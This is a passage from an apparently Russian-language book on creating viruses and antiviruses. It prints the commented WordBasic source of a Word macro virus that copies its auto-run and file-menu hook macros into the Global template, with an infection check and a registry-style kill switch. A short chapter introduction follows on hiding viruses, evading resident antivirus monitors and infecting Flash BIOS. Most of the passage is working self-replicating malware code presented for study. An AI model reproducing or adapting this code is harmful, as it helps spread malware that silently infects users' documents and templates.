Читаем Создаем вирус и антивирус полностью

Macro name: AutoNew [AUTONEW] ”U”

Encryption key: DF

Sub MAIN

’Включаем обработку автоматических макросов

DisableAutoMacros 0

’Проверим, установлен ли макрос. Если макрос AutoExec

’присутствует, считаем, что файл заражен

If (Installed=0) And (ForgetIt=0) Then

’Заразим. Копируем макрос

MacroCopy WindowName$+”:AutoExec”, ”Global:AutoExec”, 1

MacroCopy WindowName$+”:AutoNew”, ”Global:AutoNew”, 1

MacroCopy WindowName$+”:AutoOpen”, ”Global:AutoOpen”, 1

MacroCopy WindowName$+”:DateiSpeichern”, ”Global:DateiSpeichern”, 1

MacroCopy WindowName$+”:DateiSpeichernUnter”,

”Global:DateiSpeichernUnter”, 1

MacroCopy WindowName$+”:DateiBeenden”,

”Global:DateiBeenden”, 1

MacroCopy WindowName$+”:ExtrasOptionen”,

”Global:ExtrasOptionen”, 1

MacroCopy WindowName$+”:DateiDokvorlagen”, ”Global:

DateiDokvorlagen”, 1

MacroCopy WindowName$+”:It”, ”Global:It”, 1

MacroCopy WindowName$+”:DateiDrucken”, ”Global:DateiDrucken”, 1

End If

End Sub

’Функция проверяет, инсталлирован ли макрос AutoExec

Function Installed

’Установим переменную Installed в 0 (инициализация переменной).

’При положительном результате проверки установим ее в 1

Installed=0

’Проверим, есть ли макросы

If CountMacros(0) > 0 Then

’Проверим имена макросов. Если есть AutoExec,

’установим переменную Installed в 1

For i=1 To CountMacros(0)

If MacroName$(i, 0)=”AutoExec” Then

Installed=1

End If

Next i

End If

End Function

Function ForgetIt

ForgetIt=0

Section$=”Compatibility”

ProfilName$=”Nomvir”

BlaBla$=GetProfileString$(Section$, ProfilName$)

If BlaBla$=”0x0690690” Then

ForgetIt=1

End If

В этой главе рассказано, как может быть спрятан вирус. Описаны методы конструирования прямого обращения к DOS для «обмана» резидентных антивирусных мониторов. Рассмотрены вирусы, заражающие Flash BIOS. Представлены исходные тексты программ с подробными комментариями.

Персональные компьютеры год от года становятся все сложнее и сложнее, используют все более высокие аппаратные и программные технологии. Компьютерные вирусы тоже не отстают и пытаются приспособиться к новым условиям обитания. Так, вирусы научились заражать загрузочные сектора дисков, файлы для операционных систем DOS, Windows, Windows 95, OS/2, Linux и даже документы Word, Excel и MS-Office 97. Скрывая свое присутствие в системе, они стали невидимками, или стелс-вирусами. Они научились быть полиморфными для того, чтобы их распознавание стало еще более трудной задачей для разработчиков антивирусных средств. С появлением процессоров i386 вирусы стали использовать в своем коде 32-разрядные инструкции. В настоящее время полиморфные вирусы используют 32-разрядные расшифровывающие команды в своем декрипторе.

Одним словом, вирусы хотят выжить и победить. Для этого они используют все новые возможности, как программные, так и аппаратные. Но защищенный режим работы, появившийся вместе с процессором i286, до недавнего времени вирусам никак не удавалось «приручить». Вернее, были «пробы пера», но реального решения этой задачи они не дали.